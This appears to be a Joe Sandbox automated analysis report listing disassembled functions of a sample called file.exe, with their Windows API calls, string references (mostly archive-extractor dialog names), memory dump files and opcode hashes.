Part of subcall function 007D8DCC: GetLastError.KERNEL32(007E3A34,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34,007E3A34), ref: 007D8DF4

_free.LIBCMT ref: 007DC829
_free.LIBCMT ref: 007DC83B
_free.LIBCMT ref: 007DC84D
_free.LIBCMT ref: 007DC85F

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 667018d6be4c1dd340c0e94cf0324b7424007c586ab7c994a3ccc38ad5d5c497
Instruction ID: 6a5e8182a66385a9824b90df7a90514a3908f7b319e9a525a1c97dcf31c330ea
Opcode Fuzzy Hash: 667018d6be4c1dd340c0e94cf0324b7424007c586ab7c994a3ccc38ad5d5c497
Instruction Fuzzy Hash: A9F01232605241FB9661DB68E4C9C1673FAAA4C7147585C1BF108DB792CB7CFC80DAA5

Function 007C1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007C1FE5
_wcslen.LIBCMT ref: 007C1FF6
_wcslen.LIBCMT ref: 007C2006
_wcslen.LIBCMT ref: 007C2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,007BB371,?,?,00000000,?,?,?), ref: 007C202F

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: b516b66e8bc23303792bab31865a1661f85511bce863a81982d0aeb9150358a8
Instruction ID: c46fad7bffde7557a76bc5eba3b93dd640fa7a63f77e1f5ebf583250196daa84
Opcode Fuzzy Hash: b516b66e8bc23303792bab31865a1661f85511bce863a81982d0aeb9150358a8
Instruction Fuzzy Hash: 33F06D32008014BBCF221F50EC09E8A3F26EB44760B11804AF61A5B0A3CB7696A2D7A0

Function 007C15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007C17BC
_swprintf.LIBCMT ref: 007C186B

Strings

%ls, xrefs: 007C1641, 007C1657
%s: %s, xrefs: 007C17CB

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: ba4f6238d516ea9da0a4c95e77d527ae2c760fc7fdd174e55d19b864ca8f3ce1
Instruction ID: b6f2ce578e15b8b689b20cce96f07a839cd5ee22c4eb46b8cf378a9f964ca9a2
Opcode Fuzzy Hash: ba4f6238d516ea9da0a4c95e77d527ae2c760fc7fdd174e55d19b864ca8f3ce1
Instruction Fuzzy Hash: CF51F83528C300F6E6221A908D4AF7573A5AB07B04FA4457EF786744E3DEAEA410A75F

Function 007D7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 007D7FAE
_free.LIBCMT ref: 007D8079
_free.LIBCMT ref: 007D8083

Strings

C:\Users\user\Desktop\file.exe, xrefs: 007D7FA5, 007D7FAC, 007D7FDB, 007D8013

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\file.exe
API String ID: 2506810119-517116171
Opcode ID: 6c086b349b07ab40d07ebedea271421bd9337c9399a42dffe47e1b5362121eaa
Instruction ID: 66d846da1c5e1025015dde276100e162b8d953e595b1f0f09386692b9deb0c84
Opcode Fuzzy Hash: 6c086b349b07ab40d07ebedea271421bd9337c9399a42dffe47e1b5362121eaa
Instruction Fuzzy Hash: F331AF71A04208EFCB21DF95DC8499EBBBCEF94310F104167F50497350DA798A45CB92

Function 007D31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007D31FB
_abort.LIBCMT ref: 007D3306

Strings

RCC, xrefs: 007D3215
MOC, xrefs: 007D320D

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 786e4fdec21d2d63fee5317b269962eede556beb0e1236f2f83c431297cb4d3f
Instruction ID: 7c3afff93875c0c8f7e539751436009e0635188b34ee1f7df4984fb8af825aab
Opcode Fuzzy Hash: 786e4fdec21d2d63fee5317b269962eede556beb0e1236f2f83c431297cb4d3f
Instruction Fuzzy Hash: A9415771900209EFDF15DF98CD81AAEBBB5BF48304F18815AF904A7212D339AA51DB52

Function 007B7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B7406

Part of subcall function 007B3BBA: __EH_prolog.LIBCMT ref: 007B3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 007B74CD

Part of subcall function 007B7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007B7AAB
Part of subcall function 007B7A9C: GetLastError.KERNEL32 ref: 007B7AF1
Part of subcall function 007B7A9C: CloseHandle.KERNEL32(?), ref: 007B7B00

Strings

SeSecurityPrivilege, xrefs: 007B744B
SeRestorePrivilege, xrefs: 007B7460

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: da73ec8b3d954e17ccc2020d6d2edd594005fd33a2468e3c93a5ea6aa9c078af
Instruction ID: 0eede2fa81c9d5d2d6ebfdca3b8a8bd6e9cb8aaaed1e5235cd82054ef95cb394
Opcode Fuzzy Hash: da73ec8b3d954e17ccc2020d6d2edd594005fd33a2468e3c93a5ea6aa9c078af
Instruction Fuzzy Hash: 683196B1E04298EADF25EBA4DC49FFE7BA9AF49304F044059F405A7282DB7C8A44C761

Function 007CAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 007B1316: GetDlgItem.USER32(00000000,00003021), ref: 007B135A
Part of subcall function 007B1316: SetWindowTextW.USER32(00000000,007E35F4), ref: 007B1370

EndDialog.USER32(?,00000001), ref: 007CAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 007CADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 007CADC2

Strings

ASKNEXTVOL, xrefs: 007CAD28

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 7844d374638d24ba51f284816652194823ac335a3b864daf6b9c2dabd1c2ba9e
Instruction ID: 305276a5907f1433de46fc01e14f5b3b17218c4304b0163e104cc45abe0d0cb2
Opcode Fuzzy Hash: 7844d374638d24ba51f284816652194823ac335a3b864daf6b9c2dabd1c2ba9e
Instruction Fuzzy Hash: ED11B132340208BFD6119F689C09FEA37ADFF4A74BF404018F342DB5A8CB6999059766

Function 007BD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 007BD954
_strncpy.LIBCMT ref: 007BD99A

Part of subcall function 007C1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,007F1030,00000200,007BD928,00000000,?,00000050,007F1030), ref: 007C1DC4

Strings

@%s, xrefs: 007BD93E
$%s, xrefs: 007BD949

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 1fccff3d95d8daf009a2e21d64a9fc54f17172150471f120b14ad324206de16a
Instruction ID: 4913e6c71fc307968fd0f14972463fa8802849c24db09e661d9e251a448e30e9
Opcode Fuzzy Hash: 1fccff3d95d8daf009a2e21d64a9fc54f17172150471f120b14ad324206de16a
Instruction Fuzzy Hash: 3221A27244024CEEDB30EEA4CC09FEE7BA8EF05304F044526F950961A2F67AEA58CB51

Function 007C0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,007BAC5A,00000008,?,00000000,?,007BD22D,?,00000000), ref: 007C0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,007BAC5A,00000008,?,00000000,?,007BD22D,?,00000000), ref: 007C0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,007BAC5A,00000008,?,00000000,?,007BD22D,?,00000000), ref: 007C0E9F

Strings

Thread pool initialization failed., xrefs: 007C0EB7

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: f76f03b4ef06dd02de987f216cb617d59b1767e1877310415bcbd38804f35686
Instruction ID: 4cfc88be9097b31cbce4e80f4848db0e0a786693e93bcb7cb7c1a9796080415f
Opcode Fuzzy Hash: f76f03b4ef06dd02de987f216cb617d59b1767e1877310415bcbd38804f35686
Instruction Fuzzy Hash: 1B1151B1681708DFC3215F6A9C88AA7FBECEB59744F14482EF1DAC7200D67969408BA4

Function 007CB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 007B1316: GetDlgItem.USER32(00000000,00003021), ref: 007B135A
Part of subcall function 007B1316: SetWindowTextW.USER32(00000000,007E35F4), ref: 007B1370

EndDialog.USER32(?,00000001), ref: 007CB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 007CB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 007CB304

Strings

GETPASSWORD1, xrefs: 007CB289

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: cc61363d8ca66b14e88b81ea00b0e60aa1827e05e75c194f39df4eb0d49bdfaa
Instruction ID: 5effcbc3ceb65d7518611f79ccbd322443e33d1c273ce5e986392094237f97ad
Opcode Fuzzy Hash: cc61363d8ca66b14e88b81ea00b0e60aa1827e05e75c194f39df4eb0d49bdfaa
Instruction Fuzzy Hash: 0011C832900128B6DB219A74AC4AFFF376CFF19700F000029FA45F30C0C7A89A459761

Function 007B124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 007B125D

Strings

A, xrefs: 007B1285
2|, xrefs: 007B1292
(|, xrefs: 007B12A3

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Malloc
String ID: (|$2|$A
API String ID: 2696272793-140607768
Opcode ID: ac9808f06d70ee6b24a1dec56719808e96f4ac1cb4fe90950dff247196e6a21b
Instruction ID: e598b2d0ac5d27b0707fdf5e387bd01966ad580e5d5bc148833641bab25bd3bc
Opcode Fuzzy Hash: ac9808f06d70ee6b24a1dec56719808e96f4ac1cb4fe90950dff247196e6a21b
Instruction Fuzzy Hash: 5101DB75D01219ABCB14DFA4D859AEEBBF8BF09310B50415AE905E7250D7749A40CF94

Function 007CDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 007CDD1C, 007CDD50
RENAMEDLG, xrefs: 007CDD31

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 58044a2ee2250079c51b24a4b420359399a26a2cc1023d93fc8ea724d6b9e53a
Instruction ID: 760134b08482e922915820ce840c51ac7269f5711a46f1def485840c8e81d879
Opcode Fuzzy Hash: 58044a2ee2250079c51b24a4b420359399a26a2cc1023d93fc8ea724d6b9e53a
Instruction Fuzzy Hash: C0015E76A04285EFDB618FA5EC44EB67BA8FB08354B00843EF90692230D6399C50DBA5

Function 007B1316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 007BE2E8: _swprintf.LIBCMT ref: 007BE30E
Part of subcall function 007BE2E8: _strlen.LIBCMT ref: 007BE32F
Part of subcall function 007BE2E8: SetDlgItemTextW.USER32(?,007EE274,?), ref: 007BE38F
Part of subcall function 007BE2E8: GetWindowRect.USER32(?,?), ref: 007BE3C9
Part of subcall function 007BE2E8: GetClientRect.USER32(?,?), ref: 007BE3D5

GetDlgItem.USER32(00000000,00003021), ref: 007B135A
SetWindowTextW.USER32(00000000,007E35F4), ref: 007B1370

Strings

|, xrefs: 007B134A
0, xrefs: 007B1319

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: |$0
API String ID: 2622349952-693854427
Opcode ID: 0f79a644303efae4bcd171a9ab3e25eb2b4615252bc05b89341b375ad7873596
Instruction ID: 693c35278b9e444fee3a51624d7765debf8ae7dc00a57f0399aa488bc63f08e4
Opcode Fuzzy Hash: 0f79a644303efae4bcd171a9ab3e25eb2b4615252bc05b89341b375ad7873596
Instruction Fuzzy Hash: 4CF04F7014428CBBDF161F608C1DBFA3BA9AF46344F848114FD4556AA1FB7DCA90EB50

Function 007D9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 007D9AA9
__alldvrm.LIBCMT ref: 007D9CAA
__alldvrm.LIBCMT ref: 007D9CCC

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: 1effaa13e051401664be6af28635dfe055907ed0825224570e64efc5a4cd7c36
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 05A11772A142869FEB218F68C8917AEBBF5EF55310F18416FE6899B381D23D8D41C760

Function 007BA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,007B7F69,?,?,?), ref: 007BA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,007B7F69,?), ref: 007BA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,007B7F69,?,?,?,?,?,?,?), ref: 007BA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,007B7F69,?,?,?,?,?,?,?,?,?,?), ref: 007BA4C6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 8e5caa1a9c16c1cc86c781786ab1e4614ee70fc74bbc8408890343cbbdfc0be2
Instruction ID: caccd91dc7272b24a9adf72edd5cf628e66bed7082800a2e6fd7fb8e246fa3b1
Opcode Fuzzy Hash: 8e5caa1a9c16c1cc86c781786ab1e4614ee70fc74bbc8408890343cbbdfc0be2
Instruction Fuzzy Hash: 0241CE312483C1AAE731EF28DC49FEEBBE8AB95300F04091DB5D1D7181D6A89A48DB53

Function 007DC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007D91E0,?,00000000,?,00000001,?,?,00000001,007D91E0,?), ref: 007DC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007DCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007D6CBE,?), ref: 007DCA70
__freea.LIBCMT ref: 007DCA79

Part of subcall function 007D8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007DCA2C,00000000,?,007D6CBE,?,00000008,?,007D91E0,?,?,?), ref: 007D8E38

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 50f658225948303494d15ff3d6d03e059b2d559cc7bdb9d90e610899ce9aea51
Instruction ID: 29a19d37da6e0d264c017544159682d1beaa13d0222b664442ed52cc4cfb6995
Opcode Fuzzy Hash: 50f658225948303494d15ff3d6d03e059b2d559cc7bdb9d90e610899ce9aea51
Instruction Fuzzy Hash: CE31A271A0021AABDB25DF64CC85DAE7BB5EB45310B148269FC04EB290E739DD50CB90

Function 007CA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007CA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 007CA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CA683
